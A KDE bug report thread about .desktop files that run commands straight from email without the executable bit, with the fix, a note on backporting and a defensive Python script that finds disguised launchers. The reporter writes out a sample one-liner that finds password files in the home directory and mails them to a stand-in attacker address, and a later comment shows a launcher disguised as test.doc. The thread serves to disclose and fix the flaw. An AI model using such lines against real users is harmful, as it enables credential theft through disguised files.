Version: v1.9.8 (using KDE 3.2.0 RC1, Gentoo)
Compiler: gcc version 3.3.2 20031218 (Gentoo Linux 3.3.2-r5, propolice-3.3-7)
OS: Linux (i686) release 2.4.24

experimenting with the possible distribution of viruses or just plain mean tricks etc, i thought i'd see how far i could get with a .desktop file. i created a link to an application on the desktop and used "echo 'stuff' > ~/filename" as the command. then i emailed the file to myself. opening the file in kmail was as easy as click, save and then click the file now saved to my desktop.

granted, it's not as lethal as the "autoplay" 'feature' in outlook express, but it is worrisome that one can execute emailed code without having to manually set the +x bit. i think it'd be better if .desktop files had to be executable in order to run like that, otherwise, someone might put something a little meaner inside like: "find ~ -name '*password*' -print0 | xargs -0 cat | <something to do with /usr/sbin/sendmail> evilguy@hotmail.com"

i'm still a newbie at one liners, but the idea still stands. it's not like it'd spread very well (for now) but the more people that use kde, the more of a problem this could become.
I think this is best assigned to KMail.
There's been a lot of discussion about this in the last couple of days:
http://www.geekzone.co.nz/foobar/6229
http://lwn.net/Articles/319072/
This is a serious issue. If Freedesktop.org won't take a step, KDE should be non-compliant on this. +x seems to be the best solution.
And it should not be assigned specifically to Kmail, rather to KDE itself.
yes, patches are being developed against kdelibs, klauncher and krun. so i'm reassigning to kdelibs and changing the priority to critical.
Changing the assignee appropriately.
This is fixed in KDE 4.3, I'm queuing up patches to be backported to KDE 4.2 (although given my real job I'm not sure if I'll make it for KDE 4.2.2 as I want good review).
The file is executed even if it does not have the .desktop extension; it just needs the "[Desktop Entry]". I don't know why, but I made some tests: with an odt it opened with OpenOffice (as it should). But then I tried this: I created a file named "test.doc", with this content:

[Desktop Entry]
Type=Application
Name=test.doc
Exec=echo "foo" > test
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

Then I double-clicked the created file (worked in Dolphin and in Konqueror) and it executed the command (the file "test" was created in my home).
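An added example, not part of the original bug thread: a Python audit that finds files a desktop would treat as launchers by content rather than by extension, and reports whether each one carries the +x bit and whether its name hides what it is. The function names and the sample are constructed here, and recognising a launcher by its first group header is an assumption, not KDE's own MIME detection code.

```python
import os
import stat
import tempfile

# Constructed sample: the test.doc content from the comment above (Icon line omitted).
SAMPLE = '[Desktop Entry]\nType=Application\nName=test.doc\nExec=echo "foo" > test\n'

def parse_desktop_entry(path, max_bytes=65536):
    """Return the [Desktop Entry] keys if the content is a desktop entry, else None."""
    try:
        with open(path, "rb") as fh:
            text = fh.read(max_bytes).decode("utf-8", errors="replace")
    except OSError:
        return None
    keys, seen = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if not seen:
            if line != "[Desktop Entry]":
                return None          # only blanks and comments may precede the header
            seen = True
        elif line.startswith("["):
            break                    # a later group; [Desktop Entry] is complete
        elif "=" in line:
            key, value = line.split("=", 1)
            keys.setdefault(key.strip(), value.strip())
    return keys if seen else None

def audit(root):
    """Report every file under root whose content is a launcher with an Exec key."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            entry = parse_desktop_entry(path)
            if entry is None or "Exec" not in entry:
                continue
            findings.append({"path": path, "exec": entry["Exec"],
                             "executable": bool(os.stat(path).st_mode & stat.S_IXUSR),
                             "disguised": not name.endswith(".desktop")})
    return findings

def demo():
    """Write the constructed sample as test.doc in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "test.doc"), "w") as fh:
            fh.write(SAMPLE)
        return audit(d)
```

Entries reported with "executable" false are the ones the +x requirement discussed in this thread would stop from running silently; "disguised" marks the extension mismatch described in the comment above.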
Felipe, I know it's taken a while for me to respond but I just tried your testcase on KDE trunk and it brought up the warning dialog instead of just executing. What version of KDE did you test this with?
I tested it with KDE 4.2.2.
The patches never got backported to KDE 4.2, due to the risk of breaking 4.2, so this is expected behavior. And since the only reason the bug was left open was in case we decided to backport, I'm going to go ahead and close it.
Bug 202626 is asking for some changes in the implemented security methods for .desktop files.